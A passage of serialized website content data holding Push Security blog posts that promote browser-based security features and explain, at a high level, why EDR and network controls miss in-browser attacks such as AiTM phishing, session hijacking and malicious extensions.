applications.",{"data":24859,"content":24863,"nodeType":312},{"target":24860},{"sys":24861},{"id":24862,"type":317,"linkType":318},"74l82HIeaumFX4u9AMjj79",[],{"data":24865,"content":24866,"nodeType":178},{},[24867,24871,24881],{"data":24868,"marks":24869,"value":24870,"nodeType":173},{},[],"Push also now gives you visibility into where employees are ",{"data":24872,"content":24876,"nodeType":1698},{"target":24873},{"sys":24874},{"id":24875,"type":317,"linkType":318},"7uLeQ9twNl5RyNaWkkJNjd",[24877],{"data":24878,"marks":24879,"value":24880,"nodeType":173},{},[],"syncing their corporate browser profile",{"data":24882,"marks":24883,"value":24884,"nodeType":173},{},[]," to a personal profile, raising the risk of syncing corporate passwords to unmanaged devices — another vector for credential harvesting if those endpoints become compromised.",{"data":24886,"content":24887,"nodeType":178},{},[24888],{"data":24889,"marks":24890,"value":24891,"nodeType":173},{},[],"And of course, underlying all these features is the foundational visibility of all your apps, accounts, account vulnerabilities, and login methods that Push provides.",{"data":24893,"content":24894,"nodeType":231},{},[],{"data":24896,"content":24897,"nodeType":169},{},[24898],{"data":24899,"marks":24900,"value":24901,"nodeType":173},{},[],"Blocking malicious browser extensions",{"data":24903,"content":24904,"nodeType":235},{},[24905],{"data":24906,"marks":24907,"value":24096,"nodeType":173},{},[],{"data":24909,"content":24910,"nodeType":178},{},[24911],{"data":24912,"marks":24913,"value":24914,"nodeType":173},{},[],"Getting visibility and control over all the browser extensions used across your workforce has long been a thorny problem for security teams. ",{"data":24916,"content":24917,"nodeType":178},{},[24918],{"data":24919,"marks":24920,"value":24921,"nodeType":173},{},[],"The possible solutions haven’t been great, either. Teams could either apply a blunt-force block for most or all extensions, or spend painstaking time trying to understand what was installed, why, and by whom, across all the browsers in the environment.",{"data":24923,"content":24924,"nodeType":178},{},[24925,24929,24939],{"data":24926,"marks":24927,"value":24928,"nodeType":173},{},[],"The urgency of solving this problem increased for many organizations this year after the December 2024 compromise of at least 35 Google Chrome extensions in a ",{"data":24930,"content":24934,"nodeType":1698},{"target":24931},{"sys":24932},{"id":24933,"type":317,"linkType":318},"6sprbTRpfnTJsP3mGR2gKa",[24935],{"data":24936,"marks":24937,"value":24938,"nodeType":173},{},[],"campaign targeting browser extension developers",{"data":24940,"marks":24941,"value":24942,"nodeType":173},{},[],". Cyberhaven’s extension was one of these, and the campaign inherited their name.",{"data":24944,"content":24945,"nodeType":235},{},[24946],{"data":24947,"marks":24948,"value":24287,"nodeType":173},{},[],{"data":24950,"content":24951,"nodeType":178},{},[24952,24956,24965],{"data":24953,"marks":24954,"value":24955,"nodeType":173},{},[],"With Push, you can now get visibility across ",{"data":24957,"content":24960,"nodeType":1698},{"target":24958},{"sys":24959},{"id":2489,"type":317,"linkType":318},[24961],{"data":24962,"marks":24963,"value":24964,"nodeType":173},{},[],"all the browser extensions",{"data":24966,"marks":24967,"value":24968,"nodeType":173},{},[]," installed on employee browsers in your environment, and block the ones you don’t want.",{"data":24970,"content":24973,"nodeType":312},{"target":24971},{"sys":24972},{"id":18589,"type":317,"linkType":318},[],{"data":24975,"content":24976,"nodeType":178},{},[24977],{"data":24978,"marks":24979,"value":24980,"nodeType":173},{},[],"You can also:",{"data":24982,"content":24983,"nodeType":250},{},[24984,24994,25004],{"data":24985,"content":24986,"nodeType":254},{},[24987],{"data":24988,"content":24989,"nodeType":178},{},[24990],{"data":24991,"marks":24992,"value":24993,"nodeType":173},{},[],"Review extensions with risky permissions.",{"data":24995,"content":24996,"nodeType":254},{},[24997],{"data":24998,"content":24999,"nodeType":178},{},[25000],{"data":25001,"marks":25002,"value":25003,"nodeType":173},{},[],"Identify extensions with potentially suspicious installation methods, such as sideloaded or manually installed.",{"data":25005,"content":25006,"nodeType":254},{},[25007],{"data":25008,"content":25009,"nodeType":178},{},[25010],{"data":25011,"marks":25012,"value":25013,"nodeType":173},{},[],"Block extensions based on user groups and browser profiles (e.g. profiles logged in with a company domain).",{"data":25015,"content":25016,"nodeType":178},{},[25017,25021,25029],{"data":25018,"marks":25019,"value":25020,"nodeType":173},{},[],"Learn more about extension visibility and management in our ",{"data":25022,"content":25025,"nodeType":1698},{"target":25023},{"sys":25024},{"id":2489,"type":317,"linkType":318},[25026],{"data":25027,"marks":25028,"value":24600,"nodeType":173},{},[],{"data":25030,"marks":25031,"value":1477,"nodeType":173},{},[],{"data":25033,"content":25034,"nodeType":231},{},[],{"data":25036,"content":25037,"nodeType":169},{},[25038],{"data":25039,"marks":25040,"value":25041,"nodeType":173},{},[],"Adding a layer of protection against help desk scams",{"data":25043,"content":25044,"nodeType":235},{},[25045],{"data":25046,"marks":25047,"value":24096,"nodeType":173},{},[],{"data":25049,"content":25050,"nodeType":178},{},[25051],{"data":25052,"marks":25053,"value":25054,"nodeType":173},{},[],"Finally, another big theme in this year’s TTPs was the use of help desk social engineering to compromise organizations. ",{"data":25056,"content":25057,"nodeType":178},{},[25058,25062,25072],{"data":25059,"marks":25060,"value":25061,"nodeType":173},{},[],"Attackers like ",{"data":25063,"content":25067,"nodeType":1698},{"target":25064},{"sys":25065},{"id":25066,"type":317,"linkType":318},"wgpdyHDn9NcpIJNr7jnFp",[25068],{"data":25069,"marks":25070,"value":25071,"nodeType":173},{},[],"Scattered Spider",{"data":25073,"marks":25074,"value":25075,"nodeType":173},{},[]," — now known as part of the evolving cybercriminal group Scattered Lapsus$ Hunters — have targeted organizations including MGM Resorts and Marks & Spencer by convincing help desk staff to help them bypass MFA or reset credentials for accounts they then use to access corporate systems. ",{"data":25077,"content":25078,"nodeType":235},{},[25079],{"data":25080,"marks":25081,"value":24287,"nodeType":173},{},[],{"data":25083,"content":25084,"nodeType":178},{},[25085,25089,25094],{"data":25086,"marks":25087,"value":25088,"nodeType":173},{},[],"To provide an additional layer of security when verifying employee identities during help desk interactions, Push introduced ",{"data":25090,"marks":25091,"value":25093,"nodeType":173},{},[25092],{"type":370},"Employee verification codes",{"data":25095,"marks":25096,"value":1477,"nodeType":173},{},[],{"data":25098,"content":25102,"nodeType":312},{"target":25099},{"sys":25100},{"id":25101,"type":317,"linkType":318},"19Baqh5QwbonzsR0EcaDS8",[],{"data":25104,"content":25105,"nodeType":178},{},[25106],{"data":25107,"marks":25108,"value":25109,"nodeType":173},{},[],"These are a rotating 6-digit verification code accessible via the Push Security extension dropdown. When an employee contacts your help desk, staff can use this code to help verify their identity before performing any sensitive account changes.",{"data":25111,"content":25112,"nodeType":178},{},[25113],{"data":25114,"marks":25115,"value":25116,"nodeType":173},{},[],"Employee verification codes are lightweight, rotate every 24 hours, and don’t require any additional apps or devices.",{"data":25118,"content":25119,"nodeType":178},{},[25120,25124,25133],{"data":25121,"marks":25122,"value":25123,"nodeType":173},{},[],"Learn more about verification codes in our ",{"data":25125,"content":25129,"nodeType":1698},{"target":25126},{"sys":25127},{"id":25128,"type":317,"linkType":318},"4rLP8wr6HnvBG2OzqYYKpF",[25130],{"data":25131,"marks":25132,"value":24433,"nodeType":173},{},[],{"data":25134,"marks":25135,"value":1477,"nodeType":173},{},[],{"data":25137,"content":25138,"nodeType":231},{},[],{"data":25140,"content":25141,"nodeType":169},{},[25142],{"data":25143,"marks":25144,"value":2824,"nodeType":173},{},[],{"data":25146,"content":25147,"nodeType":178},{},[25148],{"data":25149,"marks":25150,"value":25151,"nodeType":173},{},[],"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. ",{"data":25153,"content":25154,"nodeType":178},{},[25155],{"data":25156,"marks":25157,"value":25158,"nodeType":173},{},[],"You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":25160,"content":25161,"nodeType":178},{},[25162,25166,25172,25176,25182],{"data":25163,"marks":25164,"value":25165,"nodeType":173},{},[],"To learn more about Push, check out our latest ",{"data":25167,"content":25168,"nodeType":186},{"uri":2862},[25169],{"data":25170,"marks":25171,"value":2865,"nodeType":173},{},[],{"data":25173,"marks":25174,"value":25175,"nodeType":173},{},[]," or book some time with one of our team for a ",{"data":25177,"content":25178,"nodeType":186},{"uri":2886},[25179],{"data":25180,"marks":25181,"value":2889,"nodeType":173},{},[],{"data":25183,"marks":25184,"value":1477,"nodeType":173},{},[],"Taking the fight to attackers: Push’s top features of 2025","Here’s how real-world attacks and our own R&D informed what we built for Push customers over the last year.","2025-12-17T00:00:00.000Z","taking-the-fight-to-attackers-top-features-of-2025",{"items":25190},[25191,25193],{"sys":25192,"name":509},{"id":508},{"sys":25194,"name":505},{"id":504},{"items":25196},[25197],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":25198},{"url":2911},{"__typename":1528,"sys":25200,"content":25201,"title":6647,"synopsis":25583,"hashTags":118,"publishedDate":25584,"slug":6648,"tagsCollection":25585,"authorsCollection":25591},{"id":2044},{"json":25202},{"data":25203,"content":25204,"nodeType":165},{},[25205,25213,25220,25227,25239,25251,25259,25266,25273,25280,25286,25289,25297,25304,25311,25323,25330,25337,25345,25352,25400,25416,25423,25431,25438,25465,25472,25480,25528,25535,25571,25577],{"data":25206,"content":25207,"nodeType":169},{},[25208],{"data":25209,"marks":25210,"value":25212,"nodeType":173},{},[25211],{"type":370},"EDR is still the best tool for attacks that touch the endpoint",{"data":25214,"content":25215,"nodeType":178},{},[25216],{"data":25217,"marks":25218,"value":25219,"nodeType":173},{},[],"Endpoint Detection and Response (EDR) tooling is fundamental to modern security. It earned its place as a foundational control by moving defense away from static, known-bad indicators and toward deep, real-time detection, investigation, and response based on behavior observed in a live environment. ",{"data":25221,"content":25222,"nodeType":178},{},[25223],{"data":25224,"marks":25225,"value":25226,"nodeType":173},{},[],"By running an agent inside the operating system, EDR gave defenders something they never had before: visibility into what was actually happening on the host as it happened, and the ability to act on it.",{"data":25228,"content":25229,"nodeType":178},{},[25230,25234],{"data":25231,"marks":25232,"value":25233,"nodeType":173},{},[],"That agent-level visibility is still incredibly powerful. File system changes, process execution, memory behavior, or registry modifications is the kind of telemetry that enables threat hunting, exposes fileless attacks, and allows teams to contain incidents by isolating a device or killing a malicious process. ",{"data":25235,"marks":25236,"value":25238,"nodeType":173},{},[25237],{"type":370},"For anything that touches the endpoint, EDR remains the right tool.",{"data":25240,"content":25241,"nodeType":178},{},[25242,25246],{"data":25243,"marks":25244,"value":25245,"nodeType":173},{},[],"But that’s the key constraint: ",{"data":25247,"marks":25248,"value":25250,"nodeType":173},{},[25249],{"type":1646},"for anything that touches the endpoint.",{"data":25252,"content":25253,"nodeType":235},{},[25254],{"data":25255,"marks":25256,"value":25258,"nodeType":173},{},[25257],{"type":370},"But modern attacks have moved beyond the endpoint",{"data":25260,"content":25261,"nodeType":178},{},[25262],{"data":25263,"marks":25264,"value":25265,"nodeType":173},{},[],"The reality of how work gets done has shifted. Most applications are now SaaS-based and accessed entirely through a browser. Employees authenticate, move data, administer systems, and interact with customers inside a browser window. And attackers have followed them there.",{"data":25267,"content":25268,"nodeType":178},{},[25269],{"data":25270,"marks":25271,"value":25272,"nodeType":173},{},[],"When attacks play out in the browser, endpoint-level signals often never appear. From the operating system’s perspective, there’s just a browser process behaving normally. The EDR agent is doing exactly what it was designed to do, but the activity that matters is happening within the browser itself.",{"data":25274,"content":25275,"nodeType":178},{},[25276],{"data":25277,"marks":25278,"value":25279,"nodeType":173},{},[],"That’s the gap teams are running into. EDR protects the integrity of the host, but it has no visibility into the live application session inside the browser. And as attackers consciously avoid the endpoint entirely, that blind spot is becoming harder to ignore.",{"data":25281,"content":25285,"nodeType":312},{"target":25282},{"sys":25283},{"id":25284,"type":317,"linkType":318},"7aVTgi4Btxl6PpzQl8kipW",[],{"data":25287,"content":25288,"nodeType":231},{},[],{"data":25290,"content":25291,"nodeType":169},{},[25292],{"data":25293,"marks":25294,"value":25296,"nodeType":173},{},[25295],{"type":370},"Attackers are consciously evading EDR",{"data":25298,"content":25299,"nodeType":178},{},[25300],{"data":25301,"marks":25302,"value":25303,"nodeType":173},{},[],"The gap endpoint teams are running into isn’t accidental. It’s the result of attackers adapting to where defenders are strongest (and weakest).",{"data":25305,"content":25306,"nodeType":178},{},[25307],{"data":25308,"marks":25309,"value":25310,"nodeType":173},{},[],"Modern EDR has made compromising the host operating system expensive and noisy. Deep telemetry and constant monitoring mean that even when an attacker manages to execute code on a device, that action is quickly under scrutiny. From there, progress is slow. After all, lateral movement and persistence take time, and all of it carries risk and generates signals defenders are good at catching.",{"data":25312,"content":25313,"nodeType":178},{},[25314,25319],{"data":25315,"marks":25316,"value":25318,"nodeType":173},{},[25317],{"type":370},"So attackers take a different route. ",{"data":25320,"marks":25321,"value":25322,"nodeType":173},{},[],"Instead of targeting the OS, they operate inside the browser session, abusing legitimate access paths to cloud applications directly over the internet. The endpoint just sees a browser session, not the malicious activity that's happening inside it. ",{"data":25324,"content":25325,"nodeType":178},{},[25326],{"data":25327,"marks":25328,"value":25329,"nodeType":173},{},[],"EDR agents are extremely good at protecting the operating system, but their visibility largely stops at the browser boundary. They can see that a browser process is running. They can’t see what a user is actually interacting with inside a specific tab, or what code is executing within the browser.",{"data":25331,"content":25332,"nodeType":178},{},[25333],{"data":25334,"marks":25335,"value":25336,"nodeType":173},{},[],"This is the shift security teams are feeling. Attacks don’t trigger endpoint alerts because they aren’t endpoint attacks. They unfold inside the browser, over standard web sessions, using legitimate accounts. To EDR, the host is unaffected. To the business, the damage is already underway.",{"data":25338,"content":25339,"nodeType":235},{},[25340],{"data":25341,"marks":25342,"value":25344,"nodeType":173},{},[25343],{"type":370},"How modern attacks circumvent EDR",{"data":25346,"content":25347,"nodeType":178},{},[25348],{"data":25349,"marks":25350,"value":25351,"nodeType":173},{},[],"Examples of modern attacks that are consciously evading EDR by staying off the endpoint include:",{"data":25353,"content":25354,"nodeType":250},{},[25355,25370,25385],{"data":25356,"content":25357,"nodeType":254},{},[25358],{"data":25359,"content":25360,"nodeType":178},{},[25361,25366],{"data":25362,"marks":25363,"value":25365,"nodeType":173},{},[25364],{"type":370},"AiTM phishing: ",{"data":25367,"marks":25368,"value":25369,"nodeType":173},{},[],"Sophisticated attacker-in-the-middle phishing kits render convincing login pages directly in the browser and proxy authentication in real time, stealing credentials or MFA tokens as the user enters them. From the OS perspective, nothing appears unusual; EDR can’t see the page structure or scripts running inside the tab.",{"data":25371,"content":25372,"nodeType":254},{},[25373],{"data":25374,"content":25375,"nodeType":178},{},[25376,25381],{"data":25377,"marks":25378,"value":25380,"nodeType":173},{},[25379],{"type":370},"Session hijacking:",{"data":25382,"marks":25383,"value":25384,"nodeType":173},{},[]," When attackers obtain a valid session token, they gain persistent access to an account without needing a password at all. Once in use, the session typically blends into normal browser activity, generating no endpoint data. ",{"data":25386,"content":25387,"nodeType":254},{},[25388],{"data":25389,"content":25390,"nodeType":178},{},[25391,25396],{"data":25392,"marks":25393,"value":25395,"nodeType":173},{},[25394],{"type":370},"Malicious browser extensions:",{"data":25397,"marks":25398,"value":25399,"nodeType":173},{},[]," Malicious extensions (either made by attackers or hijacked by them) can read page content, intercept credentials, or siphon session tokens. Because extensions operate inside the browser’s execution model, their behavior is largely invisible to endpoint tooling focused on OS-level activity.",{"data":25401,"content":25402,"nodeType":178},{},[25403,25407,25412],{"data":25404,"marks":25405,"value":25406,"nodeType":173},{},[],"Even attacks that nominally involve the endpoint often stay outside EDR’s strongest visibility. ",{"data":25408,"marks":25409,"value":25411,"nodeType":173},{},[25410],{"type":370},"ClickFix-style social engineering",{"data":25413,"marks":25414,"value":25415,"nodeType":173},{},[]," is a good example. Attackers manipulate users into taking risky actions that look legitimate, the most prominent example being executing malicious commands on the host that are deliberately obfuscated or broken into benign-looking steps. While EDR may catch the code execution (and any malware the execution attempts to install), these techniques are designed to stay ambiguous enough to avoid reliable detection.",{"data":25417,"content":25418,"nodeType":178},{},[25419],{"data":25420,"marks":25421,"value":25422,"nodeType":173},{},[],"All of these attacks succeed for the same reason: the activity unfolds inside the browser. And because EDR was never designed to observe or control what happens inside a live browser session, attackers can operate there with far less resistance.",{"data":25424,"content":25425,"nodeType":235},{},[25426],{"data":25427,"marks":25428,"value":25430,"nodeType":173},{},[25429],{"type":370},"Extending detection and response to the browser",{"data":25432,"content":25433,"nodeType":178},{},[25434],{"data":25435,"marks":25436,"value":25437,"nodeType":173},{},[],"Defenders need to meet attackers where they actually operate. That means establishing real detection and response capabilities inside the browser itself.",{"data":25439,"content":25440,"nodeType":178},{},[25441,25445,25450,25454,25462],{"data":25442,"marks":25443,"value":25444,"nodeType":173},{},[],"When endpoint security evolved, it did so by putting an agent on the host to observe behavior, collect telemetry, and act at the source — ",{"data":25446,"marks":25447,"value":25449,"nodeType":173},{},[25448],{"type":370},"getting inside the data stream",{"data":25451,"marks":25452,"value":25453,"nodeType":173},{},[],". The same logic applies here. If the browser is where credentials are entered, sessions are established, and attacks unfold, then it needs to be treated as a security surface in its own right. ",{"data":25455,"content":25457,"nodeType":186},{"uri":25456},"https://pushsecurity.com/blog/push-plus-network-security",[25458],{"data":25459,"marks":25460,"value":25461,"nodeType":173},{},[],"That doesn't mean just looking at web traffic, but examining client-side browser processes and activity that are the best, earliest indicators of bad activity. ",{"data":25463,"marks":25464,"value":37,"nodeType":173},{},[],{"data":25466,"content":25467,"nodeType":178},{},[25468],{"data":25469,"marks":25470,"value":25471,"nodeType":173},{},[],"This doesn’t replace EDR. EDR secures the host. Identity tools govern authentication. But the browser, the layer that connects users to everything else, is a blind spot. Extending detection and response into that layer fills the gap while complementing the controls that already work.",{"data":25473,"content":25474,"nodeType":235},{},[25475],{"data":25476,"marks":25477,"value":25479,"nodeType":173},{},[25478],{"type":370},"Your browser detection and response checklist",{"data":25481,"content":25482,"nodeType":250},{},[25483,25498,25513],{"data":25484,"content":25485,"nodeType":254},{},[25486],{"data":25487,"content":25488,"nodeType":178},{},[25489,25494],{"data":25490,"marks":25491,"value":25493,"nodeType":173},{},[25492],{"type":370},"Browser-native protection: ",{"data":25495,"marks":25496,"value":25497,"nodeType":173},{},[],"Running inside the browser is the only way you can see what page a user is interacting with, what scripts are running, and how the session is behaving in real time. It’s also the only place you can reliably distinguish between normal user activity and attacker-driven manipulation.",{"data":25499,"content":25500,"nodeType":254},{},[25501],{"data":25502,"content":25503,"nodeType":178},{},[25504,25509],{"data":25505,"marks":25506,"value":25508,"nodeType":173},{},[25507],{"type":370},"Behavioral detection:",{"data":25510,"marks":25511,"value":25512,"nodeType":173},{},[]," Detection can’t rely on static indicators. It has to be based on behaviors — like how pages render, how credentials are submitted, and how sessions are established and abused. ",{"data":25514,"content":25515,"nodeType":254},{},[25516],{"data":25517,"content":25518,"nodeType":178},{},[25519,25524],{"data":25520,"marks":25521,"value":25523,"nodeType":173},{},[25522],{"type":370},"Real-time interception:",{"data":25525,"marks":25526,"value":25527,"nodeType":173},{},[]," Response has to be immediate. Blocking credential submission, interrupting a malicious action, capturing high-fidelity context, all of that needs to happen at the point of interaction — before an account is compromised.",{"data":25529,"content":25530,"nodeType":178},{},[25531],{"data":25532,"marks":25533,"value":25534,"nodeType":173},{},[],"This is what it means to extend detection and response to the browser: not another tool bolted onto the stack, but a necessary evolution in how modern attacks are actually stopped.",{"data":25536,"content":25537,"nodeType":3769},{},[25538],{"data":25539,"content":25540,"nodeType":178},{},[25541,25544,25550,25553,25559,25562,25568],{"data":25542,"marks":25543,"value":3925,"nodeType":173},{},[],{"data":25545,"content":25546,"nodeType":186},{"uri":1456},[25547],{"data":25548,"marks":25549,"value":3932,"nodeType":173},{},[],{"data":25551,"marks":25552,"value":2936,"nodeType":173},{},[],{"data":25554,"content":25555,"nodeType":186},{"uri":3941},[25556],{"data":25557,"marks":25558,"value":3944,"nodeType":173},{},[],{"data":25560,"marks":25561,"value":3949,"nodeType":173},{},[],{"data":25563,"content":25564,"nodeType":186},{"uri":1469},[25565],{"data":25566,"marks":25567,"value":1472,"nodeType":173},{},[],{"data":25569,"marks":25570,"value":1477,"nodeType":173},{},[],{"data":25572,"content":25576,"nodeType":312},{"target":25573},{"sys":25574},{"id":25575,"type":317,"linkType":318},"1doMkOu2ZuGqMp2VJgV5pb",[],{"data":25578,"content":25579,"nodeType":178},{},[25580],{"data":25581,"marks":25582,"value":37,"nodeType":173},{},[],"Why extending detection and response into the browser is crucial in the face of modern attacks that consciously evade the network and endpoint. ","2026-01-30T00:00:00.000Z",{"items":25586},[25587,25589],{"sys":25588,"name":505},{"id":504},{"sys":25590,"name":509},{"id":508},{"items":25592},[25593],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":25596},"Peyton Padfield","Peyton",{"url":25597},"https://images.ctfassets.net/y1cdw1ablpvd/1GU01HXElmc07nwi89qP3b/3188050420106c62e9df2ed4e4893b7f/1677005177901__1_.jpeg",{"__typename":1528,"sys":25599,"content":25600,"title":6643,"synopsis":26089,"hashTags":118,"publishedDate":25584,"slug":6644,"tagsCollection":26090,"authorsCollection":26096},{"id":2023},{"json":25601},{"data":25602,"content":25603,"nodeType":165},{},[25604,25612,25619,25626,25638,25646,25653,25660,25667,25675,25678,25686,25693,25700,25707,25724,25730,25737,25755,25763,25881,25884,25892,25899,25911,25918,25924,25931,25938,25946,25953,25961,25968,25975,25982,26030,26042,26078,26083],{"data":25605,"content":25606,"nodeType":169},{},[25607],{"data":25608,"marks":25609,"value":25611,"nodeType":173},{},[25610],{"type":370},"Defense used to start at the network perimeter",{"data":25613,"content":25614,"nodeType":178},{},[25615],{"data":25616,"marks":25617,"value":25618,"nodeType":173},{},[],"If you've been working in security for any length of time, you know where defense starts: the network. Long before cloud-first or SaaS-first became default, the perimeter was where defenders had leverage: visibility, enforcement, and control over traffic moving in and out of the organization.",{"data":25620,"content":25621,"nodeType":178},{},[25622],{"data":25623,"marks":25624,"value":25625,"nodeType":173},{},[],"That mental model hasn’t disappeared. Secure Web Gateways, Cloud Access Security Brokers, and the converged Security Service Edge architecture exist because the problem they solve is still real. Organizations generate an enormous volume of web traffic, and someone has to monitor it, filter it, and enforce policy at scale. These tools sit inline, log metadata, apply categorization, and block what’s already known to be dangerous. Without them, the environment quickly becomes unmanageable and extremely difficult to secure.",{"data":25627,"content":25628,"nodeType":178},{},[25629,25633],{"data":25630,"marks":25631,"value":25632,"nodeType":173},{},[],"They are very good at what they were designed to do: securing the wire. ",{"data":25634,"marks":25635,"value":25637,"nodeType":173},{},[25636],{"type":370},"But what happens over the wire is not the full picture. ",{"data":25639,"content":25640,"nodeType":235},{},[25641],{"data":25642,"marks":25643,"value":25645,"nodeType":173},{},[25644],{"type":370},"Traffic isn't the whole picture anymore",{"data":25647,"content":25648,"nodeType":178},{},[25649],{"data":25650,"marks":25651,"value":25652,"nodeType":173},{},[],"A significant amount of activity happens locally, inside the browser, beyond the visibility of network controls. Modern webpages are effectively complicated web apps that are rendered client-side via JavaScript — and not everything that happens on the page is traffic-generating. ",{"data":25654,"content":25655,"nodeType":178},{},[25656],{"data":25657,"marks":25658,"value":25659,"nodeType":173},{},[],"That distinction matters more than it used to. Authentication, data access, administrative actions, almost all of it now happens inside a browser tab. As a result, the browser has become a central point of both productivity and risk.",{"data":25661,"content":25662,"nodeType":178},{},[25663],{"data":25664,"marks":25665,"value":25666,"nodeType":173},{},[],"Network tools still see the pipeline of traffic moving back and forth. But attackers have adapted to operate within that pipeline rather than around it. They don’t need to break the connection or trigger obvious anomalies. They target the content rendered inside the browser and the user interacting with it.",{"data":25668,"content":25669,"nodeType":178},{},[25670],{"data":25671,"marks":25672,"value":25674,"nodeType":173},{},[25673],{"type":370},"That leaves security teams with noisy traffic visibility and very little insight into the actual attack unfolding inside the browser session.",{"data":25676,"content":25677,"nodeType":231},{},[],{"data":25679,"content":25680,"nodeType":169},{},[25681],{"data":25682,"marks":25683,"value":25685,"nodeType":173},{},[25684],{"type":370},"Traffic visibility vs. in-browser context",{"data":25687,"content":25688,"nodeType":178},{},[25689],{"data":25690,"marks":25691,"value":25692,"nodeType":173},{},[],"The modern attacker's playbook is built on a simple idea: stay inside the network’s line of sight without triggering detections or enforcement. Containing operations to the browser layer provides attackers with an easy bypass of many traditional network controls without ever needing to break or evade them outright.",{"data":25694,"content":25695,"nodeType":178},{},[25696],{"data":25697,"marks":25698,"value":25699,"nodeType":173},{},[],"They do this by staying ahead of known-bad detection models, constantly rotating domains and URLs, using anti-analysis techniques, and delivering phishing lures through channels that bypass traditional network ingress points like the email gateway (like social media or SMS). In many cases, the link is never evaluated by perimeter controls at all.",{"data":25701,"content":25702,"nodeType":178},{},[25703],{"data":25704,"marks":25705,"value":25706,"nodeType":173},{},[],"This creates a fundamental visibility gap. Network security tools can see a request going to a legitimate-looking destination, but they can’t observe what happens once the page executes client-side in the browser. Malicious scripts and phishing elements often don’t appear until after the page loads and a user interacts with it, leaving nothing obviously known-bad for network controls to detect.",{"data":25708,"content":25709,"nodeType":178},{},[25710,25714,25720],{"data":25711,"marks":25712,"value":25713,"nodeType":173},{},[],"Blocklists don’t help much here either. Domains rotate constantly, and the window between a phishing site going live and being categorized as malicious is more than enough time for an attacker to succeed. Until that happens, the traffic appears benign and the user is free to interact with the page. And to make matters worse, attackers are leveraging ",{"data":25715,"content":25716,"nodeType":186},{"uri":8987},[25717],{"data":25718,"marks":25719,"value":8157,"nodeType":173},{},[],{"data":25721,"marks":25722,"value":25723,"nodeType":173},{},[]," designed to frustrate these detections — meaning most bad pages aren't spotted until it's way too late. ",{"data":25725,"content":25729,"nodeType":312},{"target":25726},{"sys":25727},{"id":25728,"type":317,"linkType":318},"38X1De97xJ8B6GNXTHW6Y5",[],{"data":25731,"content":25732,"nodeType":178},{},[25733],{"data":25734,"marks":25735,"value":25736,"nodeType":173},{},[],"Consider attacker-in-the-middle phishing. From the proxy’s perspective, everything looks clean: user → reputable domain → “standard” web traffic. The phishing infrastructure is often hidden behind redirects or conditional logic designed to screen out proxies and scanners. Inside the browser session, however, credentials are intercepted, session tokens are harvested, and MFA is bypassed in real time.",{"data":25738,"content":25739,"nodeType":178},{},[25740,25744,25751],{"data":25741,"marks":25742,"value":25743,"nodeType":173},{},[],"For ",{"data":25745,"content":25746,"nodeType":186},{"uri":5002},[25747],{"data":25748,"marks":25749,"value":25750,"nodeType":173},{},[],"modern threat groups",{"data":25752,"marks":25753,"value":25754,"nodeType":173},{},[],", these obscured attack vectors lead directly to initial access and account takeover. The network is no longer the control point where the most consequential attacks can be reliably stopped.",{"data":25756,"content":25757,"nodeType":178},{},[25758],{"data":25759,"marks":25760,"value":25762,"nodeType":173},{},[25761],{"type":1646},"Browser telemetry is key to detecting and blocking malicious content in real-time, rather than relying on blocklists using known-bad indicators like domains and IPs that go out of date as quickly as new entries appear.",{"data":25764,"content":25765,"nodeType":1653},{},[25766,25789,25812,25835,25858],{"data":25767,"content":25768,"nodeType":1657},{},[25769,25779],{"data":25770,"content":25771,"nodeType":1661},{},[25772],{"data":25773,"content":25774,"nodeType":178},{},[25775],{"data":25776,"marks":25777,"value":25778,"nodeType":173},{},[],"What you see with traffic analysis",{"data":25780,"content":25781,"nodeType":1661},{},[25782],{"data":25783,"content":25784,"nodeType":178},{},[25785],{"data":25786,"marks":25787,"value":25788,"nodeType":173},{},[],"What you can see with browser telemetry",{"data":25790,"content":25791,"nodeType":1657},{},[25792,25802],{"data":25793,"content":25794,"nodeType":1687},{},[25795],{"data":25796,"content":25797,"nodeType":178},{},[25798],{"data":25799,"marks":25800,"value":25801,"nodeType":173},{},[],"HTTP request/response bodies ",{"data":25803,"content":25804,"nodeType":1687},{},[25805],{"data":25806,"content":25807,"nodeType":178},{},[25808],{"data":25809,"marks":25810,"value":25811,"nodeType":173},{},[],"DOM structure fingerprints",{"data":25813,"content":25814,"nodeType":1657},{},[25815,25825],{"data":25816,"content":25817,"nodeType":1687},{},[25818],{"data":25819,"content":25820,"nodeType":178},{},[25821],{"data":25822,"marks":25823,"value":25824,"nodeType":173},{},[],"URLs and headers",{"data":25826,"content":25827,"nodeType":1687},{},[25828],{"data":25829,"content":25830,"nodeType":178},{},[25831],{"data":25832,"marks":25833,"value":25834,"nodeType":173},{},[],"User interaction metadata ",{"data":25836,"content":25837,"nodeType":1657},{},[25838,25848],{"data":25839,"content":25840,"nodeType":1687},{},[25841],{"data":25842,"content":25843,"nodeType":178},{},[25844],{"data":25845,"marks":25846,"value":25847,"nodeType":173},{},[],"Cookie values in transit",{"data":25849,"content":25850,"nodeType":1687},{},[25851],{"data":25852,"content":25853,"nodeType":178},{},[25854],{"data":25855,"marks":25856,"value":25857,"nodeType":173},{},[],"Cookie names and attributes",{"data":25859,"content":25860,"nodeType":1657},{},[25861,25871],{"data":25862,"content":25863,"nodeType":1687},{},[25864],{"data":25865,"content":25866,"nodeType":178},{},[25867],{"data":25868,"marks":25869,"value":25870,"nodeType":173},{},[],"Static JS code",{"data":25872,"content":25873,"nodeType":1687},{},[25874],{"data":25875,"content":25876,"nodeType":178},{},[25877],{"data":25878,"marks":25879,"value":25880,"nodeType":173},{},[],"Script execution patterns and dynamic JS analysis",{"data":25882,"content":25883,"nodeType":231},{},[],{"data":25885,"content":25886,"nodeType":169},{},[25887],{"data":25888,"marks":25889,"value":25891,"nodeType":173},{},[25890],{"type":370},"Securing the browser session is key to stopping modern threats",{"data":25893,"content":25894,"nodeType":178},{},[25895],{"data":25896,"marks":25897,"value":25898,"nodeType":173},{},[],"If the browser is where users actually work, and where attackers actually operate, then that’s the layer that defenders need to understand and control.",{"data":25900,"content":25901,"nodeType":178},{},[25902,25906],{"data":25903,"marks":25904,"value":25905,"nodeType":173},{},[],"Modern web-based attacks don’t succeed because traffic goes uninspected. They succeed because network inspection can’t follow the interaction far enough. 